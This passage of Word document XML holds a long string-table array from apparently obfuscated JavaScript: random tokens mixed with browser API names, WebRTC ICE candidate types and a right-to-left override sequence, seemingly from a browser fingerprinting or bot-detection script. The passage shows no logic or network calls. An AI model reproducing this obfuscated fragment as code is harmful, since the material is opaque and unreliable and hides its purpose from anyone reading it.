      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "set", "3gndOKZWXQ", "nK8S41H1wRrOthsMC-Y", "IDO0B9ljfYUUBqis", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mIBGnSifzGSilXcjSoPZdCOpkoI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "8rIb", "string", "IccYhRvZ23XqiiA", "VBXsU7EKRN07BdTZkCQ", "bot1_wW-", "g1CpCKFQHfMZUOE", "mXD4XowgNdVMQ5T-hwh635dX", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tagName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "qwKQB_RHKZs6KLbRhA", "2mDqPIY3QclPFoT2kCwy04o", "0-hpvR6lt1k", "80-FQcY", "e36hKtR3e5dRC5-HpUggh91YHDgnsRifTuiD9V5exVv_vAk0QSAsE_Ro1FfoqOSHahGNYHE", "N6olrgr0lB-Ty0hjXvKwEV7XsLeLP5pdyn4", "dlj3dw", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>documentMode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "6WKucs1gKJY", "now", "dU72BJJ9ag", "xJse7EH3yUqN6CM8D9aO", "dzzFU9oze6Nq", "enumerable", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Odcu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "m4s_okyj-zbMzGhXZu2hFyWDg-XnYJR0", "xbUA033UyVk", "map", "^(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>--zn7c)?$|%", "Float64Array", "2Ngz8lLmwiz5gmI","554", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ktg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "empty", "8d9TliOP62HwtCBTD4iSfS-Q29r8EdJ3x1kGMPSBT5JoD4T85_HNywvQLPEK", "kAvaOK1sXPk6", "Z4EEzXCVzQ", "4jj-K5c7dcMFGd6e", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Kphz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", "6xiUDfhKSw", "4x7mf58AatwrQ8_G1WMBig", "bphlzxG3_W2z_xoTBuSrPG_v", "oUfPBKsXB6JqYfaUxXBH5ul8", "pDWJHKp6IaE", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"UkuVIPh_BYVVNIKZ8x9s1qhTBkE", "B7Yo7Rnd9A7qnUIzBZi-HVqb3OrD", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HLw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "OVG0Lstxebp4R8rRqC1k9K4LfWRq_0mNNcjuqDQu4knh4Q4IFFxrMbRKowCj-tLS", "Proxy", "true", "Date", "6hioIA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GKRmxg_vmQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "bind", "type", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>indexOf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "J0jGLJIlC_hQDMHtzx1d150rJA", "oC2SEb1_dbYgLamw41gGoP58SFsZmXfvP5rC2A", "xnSyZOR6KKBSUZ2lkFk2gw", "cNNy9x650BDKkAw", "1Z0krxE", "LE7bbrIdH-ph", "sdBjmya8uQ", "DGbCU7odffA3K_G41Xxe4fVYNB4_wBK-Mdf_-wdisF3ImnZGUytNGIo", "yT7BdJ1yftgQ", "YybrIosOaPsQIK_x7y0B7b87b39gyH6tZ8Gz_lhc5w", "zEf1N9cBMMBtbbTQ1nRQr41CNx01yyo", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>readyState</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "l1SBJ-1qbKt4ft3u0Q", "Y07pRNkLHsY6Spw", "YrERg2Shwxfz_WM2HsE", "Int8Array", "wt9XkzSClCw", "eNNRzjWL_1jf21Y_W--8CVrV_IjjEJUe3Ho", "-zzifIY5L54CWdaCpDZjxtMcfhAurxWSGf7T1SJmnBzrv1dhQBV9fvtexzirz6TJaCrD", "6JFR7S6f5G26vHgUGPSVOw", "_xf-ZakBINkEJoGqw1sS", "GH-Oe8N9R5ViHA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CoJiqQjwzAo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "value", "ZVzfVL0cce5gKO31iBNf6bU_XRxVw2uqPYeQ00sPsDGAjjctY2UNHoxmqmWfx4D4CWOkSEaGC9vmPIKLPIRg", "Va8i20HK8TaJ2BgtIuqxNmLC0a3vV5FJ7A", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zWOBGIo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "hIJQjzqBz2ytv3k", "clf_Z5E6UYZBHYA", "0rYCgX3LvSag431lFcnEayep0Ys", "XSPlU_8KUaVVDu6S", "x6Y-9G0", "g4VFzS7PmDCn4A", "AVy4PeBqZKY", "0I1PjSaKkk229ShlWJjnaCKxxPv7U_lU9xJgDK-gHdM", "BB74cYwWE-QjOsWJ0SA", "o7Ee", "top", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HRnkcPcsOA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "1GbiAJtBWqkfQA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>querySelector</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "O5piuAO1oWeQ_AwoMOj9JlGShOKuPMI", "TG-yWN0oK6NgYKr21HZAyZgWLR8GoUCKUQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lastIndexOf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "svVtmT-2g2Hb2AlVP7niXBnWtoDSQep0pjctIebtJcoAVvCv5P_O1g", "stQj_ETJ0zE", "S0XubcI_KbduMNid", "apply", "XZRrsmqZ2kyknFEYeZi1VhGd3MvOPdIHxns", "moJV32Hi1h_J", "JfJe3w7StGWN", "bF_xWIwgLchcc-_h6hcnww", "21", "yh6SOPhZU60g", "QE2vJdtjbrdTBPzMqnI7hcAUNTp66EzVOQ", "nZs-uA3Tz0G12yhsXv_SaEE", "hqxh2wKdlVieyww", "vACTKq8", "^[\\x20-\\x7E]$", "C6lK6zutvGe7sDEjBOObO3y7zw", "OzPkPYcre9wUB4M", "3R3Fd60_Le0", "t9V3-Qo", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FjamNPlIHbID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Ui-LBOVPP7oye-I", "bV2nVA", "olaVff54XeY", "KVmUOPB6IplpZbjZiw9K0710fBdI5Q", "BrMF_Ui-skftmTNxeuyAMSCB3feYIax4", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "2A7WWdEP", "Py_2Lp01", "7MpumjmO71bMw0N6eLCxCjndruPxF4IFoysRINW0QNI5Yuj_vIf5pgu6brorAmxOtbYAlMUo9zYI", "qS-MJbBTa7pTNQ", "uE0", "GRznZvUpDeIvC7bo", "U8Me7ieU1lqn_HU", "nkbHEa0xHt9Bc7OLsjcS8Q", "Symbol", "Xxu_bM1hQ6YvGcyQkQs_2JsIGDpJ", "error", "zf5C_Te2lXvvxA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TypeError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "bRXfAek5TuIuIJLp5hpP8g", "sewV-3Hnx2P2qnpzForBfwyvnayLf-wt0lU", "24VrzXOK", "x_46pT7l6GDyvzgAIA", "message", "Vt5e3AOA7HrM6A", "gZA2jS7pzwo", "Mme7JfR6ONoDDt_isz4thYw", "input", "1z2XBqNiMg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PwvWGKc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", "8XKJIrsvYpNFbA", "-TqlNMp5", "L_VwsEGEtVb82B1iXc_kCwnfmLOHb5BBiTVJG97zGf8peoLw7pf5qSLsH9Y5FmgZ0PRUxeA5txtGlH0", "de0jv0Xz7jfTlAgFNNU", "3lS-BONRELEVKqs", "6vdKrCWtiBCCj35fWZXFWA", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"b7wwozC59RGrs2BaHdWwZSXM", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getEntriesByType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "2rY", "lBDZK-paKKF7J6jXjF4a_rYhHUxI1C3_NYWs1A4_pWTPnHNIOA", "D5Q", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hOMAhxnR</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "vudW9iKdnnHP5EhUVKk", "rvJR4iKdknDm-lhe", "HGqrYtxvCP4eZg", "4VeHQuBOObdOa_2snn9etvZwNz90hiSgadXip31y_ALfnXtLHxkPWJ5X91yPv9m-SQn2DlHtS7X0JdqUaNpxZ4IpQB-nvr13ndY", "Fx6vQONA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nodeType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>avlkzCCs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "PbgS80ewlGrbkwRXVOqvFw6n8MA", "OHO5JA", "UbEj5gXXkVffnBZSXeirBlnAzvynO9gKt21tZv__f5xcfcLqhZPhrkGlTf13Om1F2qwZhdV76BFB2AIo727X", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GhmxLog</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "\u202EEWibjQBAF\u202D", "x1_gJ582", "Fvg__0_2hFijkh5UPIS9WxSIh6nuOo1S5ykpfLTbHd15Pdj4sKOx_jmSUcN9QSUK_bBN", "aCWVaOIgNsZHFpL-wCgGr6Yy", "ShP4Yb0pQg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pgGNeNZpSLovJbqp_EJb-dkH</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "-eRflHi64DL9sC8SLg", "KXu7QcsKPOdrb4WuymVt2A", "8f1t9Qu-2UXT1kghfea9C0HL_LyuJYUO2XRFNKnnAN9qaoas04Grr3_DDdNwCH8SrKt0rqB59TEQiT9x5WnfxinvpdIeWRaBOSUwLI9G", "dV3nZMgAV95JDZ6MmyVx3Ikd", "Image", "xiurMd54FpcP", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getOwnPropertyNames</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "4-Uf0mjK0zvhl3xSR5iEeiD0yJXXSqhwsxIDDvrBOuRDTPTiqdPFnRetJfYLWAlkgt0yh8kUkkA8uQZLsVGoqQKb67Q", "LN2", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gmrwMuMadoAPQME</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "tkPwPo4mKI9qddij8FZr", "rudG9TKdhEX770ZERZCZeheywJc", "Rpsi0UzerDaSzg4-", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mvsvnUXJnCjCxBdfbA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "crypto", "FATicPAwCfYbBb_Q8TZeoYo", "Option", "pow", "qvUenn7bgiPVpy0lFIf_cw", "WroEtnzz0z-jkA", "LNoRz3filR39yg", "iDLEVa0OBPJsVZiB", "object", "khDTIp8UQ_pON6I", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cPUBlHLU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "y1eWB45mQ8E", "EIs9_R_CyBylgUcv", "cpYe1nnA1nM", "JJ9Qiz-1mGyt", "eJlBrRq95267hEt2Qg", "69NU1i6F7mKEuXIqQf_GZA", "Sl6wMt9b", "p1LgNIwmAt8bGZeJ6gNsjMRqBDhT5zDNWvqNlyRQj3er_wgkdA", "3YRFgDed-WSMsD4", "Q9VtuhG5syLu2EVTbdnuGw", "MzPwRIosHc94evzbrQIjqtI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jzOYWQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "self", "F3GvHfFFSf5pFKvi30MYuqBiM10", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>RWegOsdw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", "n8NlyxqivU7EzWZZaa6gUg", "7SmYbdQgMdVqA6Lu7D8jsLwKVw", "QKhP5DiglHKlpDY", "Function", "kp4", "7-UbqGLM", "UNDEFINED", "WlaXHf9RVqB7LenI3RV--7sqVAlA2nGZJI6b2mxGtg", "MdBAymj_vEL-yxoSRIjVIG6i_aXDW6di9DFxbK7ZNQ", "W5pnvSy5", "tGy-MZJcBZ13TJDE10Rpy9ZRGzMV6x7W", "pgCkUPNEV5kWG5WA-G950fkuJSoz0kXedNKa73YN01ay8Wt4PWN4eoU4", "Gb818UDl7lvlgwJrNpv5AhaAwOnE", "A0SzF85HEZpIGdHx5QM", "max", "M0XFbaQsEvdtIf3FziJR5pswVwtD9niwFovoxz9T83fD9kVeDHN2FOEBgly78o6bBginPSraWIn7LYeMJaglHawbdkPCn9gmy6TL6y-irXVJt09H-nUY7w", "sptnpBGuyVa0mgtN", "39YE2nDyjA", "Safari", "l_wCrXXw_inyul0XY4Q", "5o80kl3H9g", "awzFRdkbEI41XvDF4lQYrfg", "9eMd2UKhpg", "xrYynyaX11s", "method", "1G_YCrsCBdlTY_26xnpCqvdm", "s0LrZoQ-MpR2UdXw-1lqh5tZDSsN_RPZGaiXmQcihWP17ActfglBcqR4nk6riLuA", "U_c44GjWtyvJ5HQLNvjWL2Ditw", "mmjjJ88D", "A-YwvgTO1VfUlR8ABqb3Tx2J5ca5I4hSz2E8RaazEJEpbYa2hc6roS6LQA", "7gDWErA", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"yUzBcMZgUZBaQN2q5A", "4Tm4CsRXdJo", "9vZGkkSXjVLK7A", "bg2YX-IQYtR5WcCcjg", "E6x89AWoySk", "wVfvOJ8oPL1jT8HG7lx7jg", "jBX7LZ8", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eyWpS_U</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-JA", "LRL1WoYUTLN-KKCntw", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>byteLength</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gRezIthr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Xbwz3UDU50eZ1B0hNvCuA2XE5_6rEo1O9XIXOY-qEMcmFbCqsMOHpBX0YrhDQnxk4_ZTjdc_u21L33I8xkjQ7lXtj7Y2", "5UaZQPRQbJY", "OzenP8F0E48JCpDrty5q1I0DPV4i_E_DCaaO_1srlQ", "ywKZetd3V7g7AK6g-Q", "P0vSPq84BfY", "J6Uo6EM", "seUw8TTKsi7xxgtM", "9waqGL0dYsJJO4OK", "EalE9xm4xG6dyGVZNMihCWmSyYI", "rfoqnFTA1QLClkwGboTvXQvatPHgVMNIqWgGQNmhaNAEDfX18s6HsFiqcaA", "Element", "V5lDty3u6XKgq1k0BbSOGQ", "llvbYfReRMNkHZmVt2wVj9k7Hg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FgDFVw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Mt1OnnK0ymf7", "LLwD92GZjWfKnDY", "jI4t8Hfj0Ec", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>YwvYWbsGOw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "uwmFQPVZT7IdOOOExHdKuPRqI0o7niz9Konh_CxIo0SHmkhEH20JCcsQ_X3cmpCqQ0msTlrRR_3oDOnSVowqC-BtSw", "ybkHozPPzD6LhEM", "Al4", "Of5HoCvoslPM", "SWe8XtsdPPx3eqSly2N6x4BUIwgRpEKJ", "Ovty_n_AuA2i9lcYKfM", "SE7nRo40FOFJ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>characterSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "wZ4", "R2LQ", "K4Irvg", "String", "PNsPj0rA1Q", "-dJ29jyR1g7txltRZw", "bzKedaxRRfsgbOvNvlkBoM1tTxIDtybrTZ6tlC8TuSuJuBIIE3trCrwYyQbq78TNXRrrKXqdV8PmYNve", "vuhT-RahmHL__Sl3D4jC", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BRqrPttj</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "ydBfsSq1g2r4s2hXVZrIahOki9aCKuo5hhs4G6fKf_9XSNbXnuvPkGmYENMuYRw3lZ01tfZL0QZz8RUfrXS7hHCC48tWBlY", "_st4i1rXjnv64Q", "123", "TJBJ3jejmUG5ujR6Xg", "DGKN", "o2mtJtx6bLI", "95FLtjSm_HO9iVFtSJf_", "lDKdf99wE4E", "window", "R1KtaMppXYI", "mivRNPpQLr92BrjdoVkW740", "iPEQmgne4Q_jtEAjAcWwTg", "JSON", "bzSwes9ib8YqA4n0sBIjn5wfXXtE5lKFT7CK2h4-zT3r9UJ_a1Y_I_Am3w", "Y_5X3DWU-WbooCQqD8mZMGXyoYeLC7Udv0B0A7-9Na9GC7Ge_J-AqVnqJetXGls316ogl4YL0Bk6rBYFjQ", "cP144w-q6EDflhIM", "bUDTDp8Ocst4ZK3ZmR4F", "vV66FrRISrY", "BDCsRalkOf0", "tF77bo4sXA", "-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nPHeaA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "HJo68QfVhQSNyEdOfrrsU1qkyfvGNMk", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>EoY</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "put", "_qpX7BGu42yZyzQ", "JAKzT_ZSaZABVIWHtXMutP5USjpB", "jweAR_prZp0wFMKJoQ", "EQGAF80", "u6Bh-VzS5w", "0qI6u2-7", "l70P41SyqF7drQx1Xg", "svhHmzeIhDz343QVf_zJRmPs", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wQLdEoo_Wdk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CustomEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Ty-WH-0", "bdR_vA2O72zFrWAIVMA", "O5td03mfngeezlNtTOGlFHHCt50", "a6Nz-xA", "sort", "Uint32Array", "8a4XrHLu2jyprXsGXvaCMHywm9uUPb1zkk8mCsnDJ6lwI8STxcDgj2-HQYxwBVxB0Y1bz-8K3WEVy2Ft00WlgHrW", "_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CmSVMVITOdSY_g</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Zo9J3XWQjgmt8XNiZ9c", "J3-tRMhNFtpZR5o", "kr9zyyS6x2K9-g", "VBOzZMFmE4A-T5vJrxsz05wFQXpL_VyFRqKUh21n0w", "oQOeBf5QMKAocg", "ibcb40f40yag1SkoD_uCCg", "some", "zsNi7zTttE-fiRJUfYfnTHrE7L2tK54", "6_hjwg6Nq3bQhkZ_aKA", "H6g13VzO8QySwg88", "4rUYhg", "3D3oYtwSHQ", "ufkUuGztqwPJ9Cl3Wqs", "oa4og1Xa", "-3T4UIgSMtsKYILwpgRv1ZY", "W90", "x1XkeLoiWv1QENqK", "fuIPj23Agg-7qiBf", "sQnlRLAOGsE5BIKKrQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Cm6UB51hdYI", "body", "UGI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pXTI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "kcEWx37doRfW9z9oWA", "0Yx3zxOB", "5OIanWPXsxbE01dMYczzFkmF", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zuE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", "call", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"OBLVRKE", "C45wvQGHi1KCyCsABd7UEmM", "hLRk5BCxkgyQ", "J2rbQKdRFcsFH5L71Qpy6Ot2URMViS2z", "-WquLso5XIprfOvo", "ucxDrx2hjk3ipWJiQo3SWRilsM2nK_4qhw", "d95whQOTqknZh0F4ew", "px0", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>teFm_UbwlXzSng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Reflect", "floor", "QrpV6jzRpiaW92pRcA", "pYsuvHvtkweZ1ltnKbLyVAKI", "6\uFE0F\u20E3", "NGXffrUiR9pGJA", "a9704418b7c42678", "oijSF7UbbOISJu6P1W1HtNR0KUEshD32PJX_9zpYskikykESSC1LS5ge_W3Bq4LgEw", "Lfw04kThix_D2wANPOKyH17U0d2IN9wahG4", "\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uFFFD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>{}", "clear", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>innerText</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Go18shuvknmF_A", "jZBdxSSIzm6R9CYxRLCbdgP2o5DSUvs", "YJlDyDePiWik8xUeBtuJIHE", "d6Za_jK_-02Kq3A_Eg", "7huIVudaQe8kKrvbjCgbg6IhZVVq", "jYJw4mA", "TcMGiEX_0wzRzC0", "6ZYvlFHX5AixiWc-bN2qLUyLuMCw", "yOx7jROTsWzRkEAMYNg", "k7ZfwyCK_nXJ-g", "b9Agj0ninzi0sT0Wa8WhRSPZ", "_HW1Isp0JoB9", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hUrFUrY</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "rcNznAixsRmcgREgW6z1", "-7cGxmHayWbA5nwgWcmBOmTq5c-QWfhqihAHUPnlb6QJQq6M_Z_QjlvwN70eNB0y", "Ij69UMtdbZM", "E80CymnN-jbMuQ", "ChLqYowsfbQQRYHK8w", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getItem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "DAq_KtBhCp9B", "OkzZWLBJVN8lJ6Sr4wxI_vJsQg4", "d8wx-lv-7inSvlI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>host|srflx|prflx|relay</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "LB2XYORpTA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lF_ccdZFWA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "cgs", "complete", "zEmUCOVVUqRSKb6hl2MT", "mcA1vkDj7xaYwFA9Pf_vVRiOr_usMNwZ1w", "rif6eQ", "width", "vT7OBqMcIPsAYoXAwU1aoQ", "data", "9BfnFIpTXsUoB-OXsQ", "U8hWjiKAgQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parentNode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "ssADyyXfiiv_73Q", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BgzjaYYyDdIBSQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "ZxfBULQVVP0pYbyixSUI56FnJRdPyWGy", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uhiUJg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "yxOcO78uCu8uDIjR", "JAD7Xpp5TNBQUdy5pVFB0cU_MS8-lUHbCw", "BYdN226SiQeV8nltac4", "RzT_PZA3L8lcW4o", "vXLVPLJgYJckRtu3tm5R7-Z5HQ", "5AaiC853Xw", "qW-_eth2AY9oWdGYvEdkjcdSESwNqhvSBLnNnSQ5iD7prE14JyM0abxxilfrhauZcHLbVXvlM4bKFNftf6VMXYFWcBjSyZoEs_qj-CyLlk46jz4OvjUfixEe1bBWLyM11AFKkTxyGFChmb9NA5HTQnOkguW46szh51YpbGh4G3yNk5hlWyuGpTTT62ofOKqPM3GsJS4gQWOPxEgcCjOglae43cTPI50STLl_lszMHlbZlYjdDyRJ0zY", "4W6sZb0", "Ud8LkALOwlPlpDkXPZzNfiqp2P2D", "yLcKg1bFsAE", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>svg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
